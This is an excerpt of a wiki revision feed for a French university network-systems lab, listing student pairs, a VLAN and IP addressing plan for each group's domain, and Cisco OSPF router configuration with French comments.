'''Il n'y a rien à faire au niveau du rip'''&lt;br /&gt;
&lt;br /&gt;
Si vous avez le moindre doute, '''demandez-nous''' !&lt;br /&gt;
&lt;br /&gt;
Cordialement,&lt;br /&gt;
&lt;br /&gt;
Le groupe 14&lt;br /&gt;
&lt;br /&gt;
==Plan d'adressage==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique) !! IP (privée) !! IP (Port ssh)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 314&lt;br /&gt;
| 193.48.57.176&lt;br /&gt;
| 100.64.0.16&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| truffe.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 312&lt;br /&gt;
| 193.48.57.177&lt;br /&gt;
| 100.64.0.17&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 311&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| pleurote.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 310&lt;br /&gt;
| 193.48.57.179&lt;br /&gt;
| 100.64.0.19&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| calicedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 309&lt;br /&gt;
| 193.48.57.180&lt;br /&gt;
| 100.64.0.20&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| piedbleu.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 308&lt;br /&gt;
| 193.48.57.181&lt;br /&gt;
| 100.64.0.21&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| girolle.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 307&lt;br /&gt;
| 193.48.57.182&lt;br /&gt;
| 100.64.0.22&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 306&lt;br /&gt;
| 193.48.57.183&lt;br /&gt;
| 100.64.0.23&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 305&lt;br /&gt;
| 193.48.57.184&lt;br /&gt;
| 100.64.0.24&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| tricholome.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 304&lt;br /&gt;
| 193.48.57.185&lt;br /&gt;
| 100.64.0.25&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 303&lt;br /&gt;
| 193.48.57.186&lt;br /&gt;
| 100.64.0.26&lt;br /&gt;
| 2222&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| ophiocordyceps.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 302&lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| 100.64.0.27&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 ISR4331 !! IPV4 Routeur !! IPV6 !! N° VRRP !! Adresse Wi-fi !! BSSID&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 1&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| 10.60.100.1&lt;br /&gt;
| 10.60.100.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.100.254&lt;br /&gt;
| 2001:660:4401:60b0::0/64&lt;br /&gt;
| 31&lt;br /&gt;
| 10.60.100.10&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.8/29&lt;br /&gt;
| 192.168.222.12&lt;br /&gt;
| 192.168.222.13&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 2001:660:4401:60b1::0/64&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 531&lt;br /&gt;
| 192.168.222.24/29&lt;br /&gt;
| 192.168.222.26&lt;br /&gt;
| 192.168.222.27&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.0/24&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 100.64.0.3&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 2001:660:4401:60b2::0/64&lt;br /&gt;
| 33&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| 301&lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 10.60.101.1&lt;br /&gt;
| 10.60.101.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.101.254&lt;br /&gt;
| 2001:660:4401:60b3::0/64&lt;br /&gt;
| 41&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| ophiocordyceps.site&lt;br /&gt;
| 302&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 10.60.102.1&lt;br /&gt;
| 10.60.102.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.102.254&lt;br /&gt;
| 2001:660:4401:60b4::0/64&lt;br /&gt;
| 42&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| 303&lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 10.60.103.1&lt;br /&gt;
| 10.60.103.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.103.254&lt;br /&gt;
| 2001:660:4401:60b5::0/64&lt;br /&gt;
| 43&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| tricholome.site&lt;br /&gt;
| 304&lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 10.60.104.1&lt;br /&gt;
| 10.60.104.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.104.254&lt;br /&gt;
| 2001:660:4401:60b6::0/64&lt;br /&gt;
| 44&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| 305&lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 10.60.105.1&lt;br /&gt;
| 10.60.105.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.105.254&lt;br /&gt;
| 2001:660:4401:60b7::0/64&lt;br /&gt;
| 45&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| 306&lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 10.60.106.1&lt;br /&gt;
| 10.60.106.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.106.254&lt;br /&gt;
| 2001:660:4401:60b8::0/64&lt;br /&gt;
| 46&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| girolle.site&lt;br /&gt;
| 307&lt;br /&gt;
| 10.60.107.0/24&lt;br /&gt;
| 10.60.107.1&lt;br /&gt;
| 10.60.107.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.107.254&lt;br /&gt;
| 2001:660:4401:60b9::0/64&lt;br /&gt;
| 47&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP7&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| piedbleu.site&lt;br /&gt;
| 308&lt;br /&gt;
| 10.60.108.0/24&lt;br /&gt;
| 10.60.108.1&lt;br /&gt;
| 10.60.108.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.108.254&lt;br /&gt;
| 2001:660:4401:60ba::0/64&lt;br /&gt;
| 48&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP8&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| calicedelamort.site&lt;br /&gt;
| 309&lt;br /&gt;
| 10.60.109.0/24&lt;br /&gt;
| 10.60.109.1&lt;br /&gt;
| 10.60.109.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.109.254&lt;br /&gt;
| 2001:660:4401:60bb::0/64&lt;br /&gt;
| 49&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP9&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| pleurote.site&lt;br /&gt;
| 310&lt;br /&gt;
| 10.60.110.0/24&lt;br /&gt;
| 10.60.110.1&lt;br /&gt;
| 10.60.110.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.110.254&lt;br /&gt;
| 2001:660:4401:60bc::0/64&lt;br /&gt;
| 50&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP10&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
| 51&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP11&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| truffe.site&lt;br /&gt;
| 312&lt;br /&gt;
| 10.60.112.0/24&lt;br /&gt;
| 10.60.112.1&lt;br /&gt;
| 10.60.112.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.112.254&lt;br /&gt;
| 2001:660:4401:60be::0/64&lt;br /&gt;
| 52&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP12&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| 314&lt;br /&gt;
| 10.60.114.0/24&lt;br /&gt;
| 10.60.114.1&lt;br /&gt;
| 10.60.114.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.114.254&lt;br /&gt;
| 2001:660:4401:60bf::0/64&lt;br /&gt;
| 54&lt;br /&gt;
| &lt;br /&gt;
| SSID_GROUP14&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Ge0/0/2&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.1/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.2/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Ge0/0/0&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| 531&lt;br /&gt;
| 213.215.6.102&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.100.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=54497</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=54497"/>
				<updated>2020-12-14T14:10:50Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==A faire==&lt;br /&gt;
&lt;br /&gt;
Chaque binôme peut :&lt;br /&gt;
* '''Compléter les tableaux du plan d'adressage'''&lt;br /&gt;
* Ajouter ses routes sur les 2 routeurs &lt;br /&gt;
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV4 (adresse + vrrp)&lt;br /&gt;
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV6 (adresse)&lt;br /&gt;
&lt;br /&gt;
Vous pouvez vous renseigner sur notre wiki.&amp;lt;br/&amp;gt;&lt;br /&gt;
Faites surtout très attention à ne pas effacer les modifications des autres groupes ainsi que les modifications communes déjà effectuées !&lt;br /&gt;
&lt;br /&gt;
'''Il n'y a rien à modifier sur les vlan 1, 131, 301, 314 et 333 !'''&amp;lt;br/&amp;gt;&lt;br /&gt;
'''Il n'y a rien à faire au niveau du rip'''&lt;br /&gt;
&lt;br /&gt;
Si vous avez le moindre doute, '''demandez-nous''' !&lt;br /&gt;
&lt;br /&gt;
Cordialement,&lt;br /&gt;
&lt;br /&gt;
Le groupe 14&lt;br /&gt;
&lt;br /&gt;
==Plan d'adressage==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique) !! IP (privée) !! IP (Port)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 14&lt;br /&gt;
| oronge.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 314&lt;br /&gt;
| 193.48.57.176&lt;br /&gt;
| 100.64.0.16&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12&lt;br /&gt;
| truffe.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 312&lt;br /&gt;
| 193.48.57.177&lt;br /&gt;
| 100.64.0.17&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 311&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10&lt;br /&gt;
| pleurote.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 310&lt;br /&gt;
| 193.48.57.179&lt;br /&gt;
| 100.64.0.19&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9&lt;br /&gt;
| calicedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 309&lt;br /&gt;
| 193.48.57.180&lt;br /&gt;
| 100.64.0.20&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8&lt;br /&gt;
| piedbleu.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 308&lt;br /&gt;
| 193.48.57.181&lt;br /&gt;
| 100.64.0.21&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7&lt;br /&gt;
| girolle.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 307&lt;br /&gt;
| 193.48.57.182&lt;br /&gt;
| 100.64.0.22&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| morillon.website&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 306&lt;br /&gt;
| 193.48.57.183&lt;br /&gt;
| 100.64.0.23&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 305&lt;br /&gt;
| 193.48.57.184&lt;br /&gt;
| 100.64.0.24&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| tricholome.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 304&lt;br /&gt;
| 193.48.57.185&lt;br /&gt;
| 100.64.0.25&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 303&lt;br /&gt;
| 193.48.57.186&lt;br /&gt;
| 100.64.0.26&lt;br /&gt;
| Port ssh : 2222&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| ophiocordyceps.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 302&lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| 100.64.0.27&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 ISR4331 !! IPV4 Routeur !! IPV6 !! N° VRRP !! Adresse Wi-fi !! BSSID&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 1&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| 10.60.100.1&lt;br /&gt;
| 10.60.100.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.100.254&lt;br /&gt;
| 2001:660:4401:60b0::0/64&lt;br /&gt;
| 31&lt;br /&gt;
| 10.60.100.10&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.8/29&lt;br /&gt;
| 192.168.222.12&lt;br /&gt;
| 192.168.222.13&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 2001:660:4401:60b1::0/64&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 531&lt;br /&gt;
| 192.168.222.24/29&lt;br /&gt;
| 192.168.222.26&lt;br /&gt;
| 192.168.222.27&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.0/24&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 100.64.0.3&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 2001:660:4401:60b2::0/64&lt;br /&gt;
| 33&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| 301&lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 10.60.101.1&lt;br /&gt;
| 10.60.101.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.101.254&lt;br /&gt;
| 2001:660:4401:60b3::0/64&lt;br /&gt;
| 41&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| ophiocordyceps.site&lt;br /&gt;
| 302&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 10.60.102.1&lt;br /&gt;
| 10.60.102.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.102.254&lt;br /&gt;
| 2001:660:4401:60b4::0/64&lt;br /&gt;
| 42&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| clavaire.site&lt;br /&gt;
| 303&lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 10.60.103.1&lt;br /&gt;
| 10.60.103.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.103.254&lt;br /&gt;
| 2001:660:4401:60b5::0/64&lt;br /&gt;
| 43&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| tricholome.site&lt;br /&gt;
| 304&lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 10.60.104.1&lt;br /&gt;
| 10.60.104.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.104.254&lt;br /&gt;
| 2001:660:4401:60b6::0/64&lt;br /&gt;
| 44&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| amanite.site&lt;br /&gt;
| 305&lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 10.60.105.1&lt;br /&gt;
| 10.60.105.2&lt;br /&gt;
| &lt;br /&gt;
| 10.60.105.254&lt;br /&gt;
| 2001:660:4401:60b7::0/64&lt;br /&gt;
